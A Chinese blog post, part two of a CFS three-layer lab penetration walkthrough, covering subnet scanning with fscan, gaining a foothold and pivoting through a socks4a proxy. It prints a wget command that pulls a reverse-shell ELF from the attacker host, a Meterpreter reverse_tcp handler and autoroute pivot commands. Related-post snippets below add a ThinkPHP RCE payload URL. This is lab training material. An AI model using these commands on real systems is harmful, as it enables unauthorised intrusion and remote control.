CFS三层内网渗透——进入二层内网并socks转发流量(二)

已于 2024-07-25 21:13:54 修改
阅读量1k 收藏 7
点赞数 23
CC 4.0 BY-SA版权
文章标签: 网络 windows 安全 linux 网络安全 服务器
于 2024-07-05 14:04:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_74171325/article/details/140191062

目录

信息收集阶段

fscan收集

对这个网段进行信息扫描

收集成功

上线阶段

​成功上传病毒文件

 给病毒文件添加可执行权限

进入msfconsole开启监听

​运行后门elf等上线

​成功上线我们攻击机

流量转发代理阶段

SOCKS端口代理,主要是转发出来代理的流量

配置参数,socks版本4a比较稳定 

​run成功开启代理监听

路由配置连接sessions,记住在sessions里面进行路由配置转发出来

 配置socks的代理到浏览器

​不开启代理不能访问

开启后成功访问 

生成一个elf病毒,然后通过蚁剑进行wget远程传输,前面文章有提到各种文件传输方式

Linux文件传输-CSDN博客文章浏览阅读271次。由于curl是访问,不带命令参数的话就是简单的访问远程目标文件,不会进行下载。这里我拿kali来演示,先创建个要传输的文件,然后python开启监听。https://blog.csdn.net/weixin_74171325/article/details/140079615?utm_source=miniapp_weixin

信息收集阶段

fscan收集

对这个网段进行信息扫描

chmod u+x fscan   #给个权限
./fscan -h 192.168.22.0/24  开始收集

收集成功

上线阶段

wget http://192.168.20.128:8000/10000_reverse.elf

成功上传病毒文件

 给病毒文件添加可执行权限

chmod u+x 10000_reverse.elf

进入msfconsole开启监听

handler -p linux/x64/meterpreter_reverse_tcp -H 192.168.20.128 -P 10000

运行后门elf等上线

 成功上线我们攻击机

流量转发代理阶段

SOCKS端口代理,主要是转发出来代理的流量

search socks

配置参数,socks版本4a比较稳定 

set srvport 20000   #修改端口
set version 4a      #修改版本

run成功开启代理监听

路由配置连接sessions,记住在sessions里面进行路由配置转发出来

sessions  
sessions 1               #进入上线主机
run autoroute -s 192.168.22.0/24   #搞个路由转发,连通我们的公网
run autoroute -p  #可以看到我们的sessions 1已经成功链接这个网段

 配置socks的代理到浏览器

 不开启代理不能访问

开启后成功访问 

53-4 内网代理6 - frp搭建三层代理
weixin_43263566的博客
07-09 423
kali连接域控远程桌面以上即完成了三级网络代理的搭建。
CFS 三层内网漫游安全测试演练
acepanhuan的博客
03-20 605
CFS 三层内网漫游安全测试演练
渗透测试——CFS三层靶机渗透
抚琴
01-29 2386
是样一个逻辑 nmap信息收集: nmap -T4 -O 192.168.1.107 http://192.168.1.107/public/ 看到这个版本就会想起:ThinkPHP-V5.0-RCE-远程代码执行漏洞 payload: http://192.168.1.107/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&var.
渗透测试之CFS三层靶机内网渗透
LvHLong的博客
02-23 6754
一、环境搭建: 靶机拓扑: 1.添加虚拟网卡: 添加 22网段(VMnet2) 和 33(VMnet3)网段的网卡 VMnet8为NAT模式与外部通信 2.配置网卡: target1网络配置: target2网络配置: target3网络配置: 3.web靶机搭建(宝塔面板启动) 启动命令: /etc/init.d/bt start 重启 /etc/init.d/bt restart 默认端口管理8888 环境搭建完 kali能ping通ta..
cfs三层靶机——内网渗透
记录学习
09-09 2226
内网渗透
CFS三层靶机内网渗透
AiENG_07的博客
12-05 1428
方法、直接通过正向代理工具neo-regroge建立socks通道,导入流量(无法使用icmp探测存活)上传tunnel文件,建立连接。登录后:重点关注上传(头像、文件、编辑器)、导出(文件、sql语句)、自定义模版(网站结构、默认页面更改),ssrf。查找当前cms的历史漏洞,若无历史漏洞,下下策为找源代码审计,大部分系统不开源故不存在代码审计过程;接下来就可以开始内网渗透了,现在忘掉配置是的网卡信息,IP信息,后台信息等等,开始全真模拟。搭建正向代理,不需要在对方服务器中额外开通端口,利用后端代码。
CFS三层宝塔内网渗透
m0_65096687的博客
04-09 888
1.靶场搭建自行百度一共有三个目标targetkali攻击机与targe1网段是一致。因为是内网渗透进入正题直接访问目标主机,发现是thinkphp5。直接百度thinkphp5的exp发现利用漏洞上传一句话木马 上传后使用蚁剑进行连接拿到权限后输入 uname-a 来查看当前主机的操作系统然后在kali中msf线上找马生成一个linux x64 的木马然后使用蚁剑传入target1中获取shell(我是一个初学者,我我的理解是使用普通的蚁剑获取shell后再使用隧道代理会有些麻烦,我也不会。所以
CFS三层内网环境 渗透流程
baynk的博客
07-07 1928
0x00 环境搭建 本身作者环境已经部署完成,只需要更改IP地址及服务策略即可正常使用。原文地址公众号teamssix,回复cfs即可。 我这里将操作时将环境做了一定调整,将Target 1的Vmnet1网卡改成了VMnet8,其余的保持不变,另外还需要在Target 1的宝塔面板中加入对应的IP地址 另外如果靶机开机时没有IP地址,也需要自己手动将IP地址配置完成,确保攻击环境和Targert 1能通信,Target 2可以和Target 1与Target 3可以相互通信。 0x01 Target
Cfs三层靶机内网渗透模拟
weixin_68210863的博客
10-23 1196
cfs三层靶机渗透详细过程
内网安全——域横向内网漫游Socks代理隧道技术
世间繁华梦一出
08-06 652
内网漫游——内网穿透Socks代理技术内网穿透Ngrok测试演示——两个内网通讯上线内网穿透Frp自建跳板测试——两个内网通讯上线CFS三层内网漫游安全测试演练——某CTF线下2019 内网穿透Ngrok测试演示——两个内网通讯上线 Ngrok代理工具的作用就是(如下图)在两个不同内网的主机之间的外网提供一台服务器内网穿透Frp自建跳板测试——两个内网通讯上线 CFS三层内网漫游安全测试演练——某CTF线下2019 ...
[内网渗透]CFS三层靶机渗透
leekos的博客,分享web安全相关知识~
08-12 1539
在MSF中开启监听,与Target2建立连接,这里需要注意,上一次代理使用的reverse_tcp是MSF作为监听,让Target1连到我们,而这次代理使用的bind_tcp是Target2作为监听,我们需要连到Target2,这个逻辑正好是相反的。我们可以设置一个路由,然后把我们的请求通过Target1的vmnet1网段发出,然后重定向转发到vmnet2网段,这样kali的msf就可以与22网段(Target2)互通了。(新开一个终端后,我们需要在这个新开的msf终端上配置一个代理,然后修改。
【VulnHub靶场】——CFS三层靶机内网渗透实操
热门推荐
Demo不是emo的博客
08-07 1万+
CFS三层靶场实操
CFS三层靶机——内网渗透流程
最新发布
2301_81177363的博客
05-05 1054
靶场由三台服务器构成分别为Target1、Target2、Target3,其系统分别是centos、Ubuntu、Windows7。Target1搭载VMnet2和NAT网卡、Target2搭载VMnet2和VMnet3网卡、Target3仅搭载VMnet3网卡。(确保两两之间能互相通信)
CFS三层靶机搭建及其内网渗透
..
07-05 7793
CFS三层靶机搭建及其内网渗透,附靶场环境
CFS三层内网靶场实战
susixteen的博客
06-23 2051
CFS三层内网内网渗透内网漫游
cfs_三层渗透之曲折之路
weixin_65575962的博客
05-10 1057
post/multi/recon/local_exploit_suggester模块查找可利用session提权。利用exploit/linux/local/cve_2021_3493_overlayfs提权payload失败。用multi/recon/local_exploit_suggester利用sessio 2进行查找提权。模块:auxiliary/scanner/discovery/arp_sweep。模块:auxiliary/scanner/portscan/tcp。
CFS三层渗透
weixin_54855337的博客
03-13 314
添加蚁剑,这样流量就能到达22段了,这里发现使用msf模块的代理,然后主机使用代理软件,会存在问题,因为虚拟机的网络就是靠主机的虚拟网卡去提供的网络,所以无意义,也是测试的时候出现了问题,第一次的时候使用frp可以成功连接,为了实现的进行直接把shell文件上传到靶机。msf的代理不稳定,可以使用其他工具,比如frp等等,然后配置proxychines,利用proxychines打开msf,在msf里面手动添加路由,也是可以进行利用的。【靶机的详情都写了宝塔的访问地址以及管理员账户密码,默认IP】
CFS三层内网靶机渗透
Ays.Ie的博客
05-18 1894
CFS三层靶机渗透全过程
CFS三层内网渗透介绍
01-07
### CFS 三层内网渗透测试技术介绍 #### 环境准备与验证 为了确保CFS三层靶机环境正常工作,在开始任何攻击之前,需确认各层之间的连通性。Kali Linux作为攻击平台能够成功Ping通Target1,而Target1可以Ping通Target2,最后Target2也应能Ping通Target3[^1]。 #### 初始访问获取 利用已知漏洞或弱口令等方式获得对第一台目标机器(Target1)的控制权是整个过程的第一步。这可能涉及到Web应用攻击、暴力破解或其他社会工程学手段来实现初步突破。 #### 内部网络探测 一旦获得了Target1上的立足点,则可以通过它进一步探索内部网络结构。此时可借助`proxychains`工具通过已经受控的目标来进行扫描操作,比如使用Nmap对后续节点(Target3)进行端口和服务检测: ```bash proxychains nmap -sT -A <Target3_IP> ``` 此命令允许绕过直接连接限制间接地收集有关更深层级主机的信息[^2]。 #### 权限提升与横向移动 当在某一层面上取得一定权限之后(例如普通用户),下一步就是寻找提权机会成为管理员级别账户;接着考虑如何安全有效地转移到下一个层次上继续实施相同策略直到达到最终目的位置即第三层(Target3)[^3]。 #### 后门建立及持久化设置 对于每一个被攻陷下来的系统来说,在完成必要的数据窃取或者其他恶意行为之余还需要留下隐蔽通道以便日后再次进入而不必重复上述复杂流程。Meterpreter模块下的`background`指令可以帮助把当前会话转入后台运行模式从而不影响其他任务执行的同时保持远程控制能力。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

古希腊掌管猴子的神

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值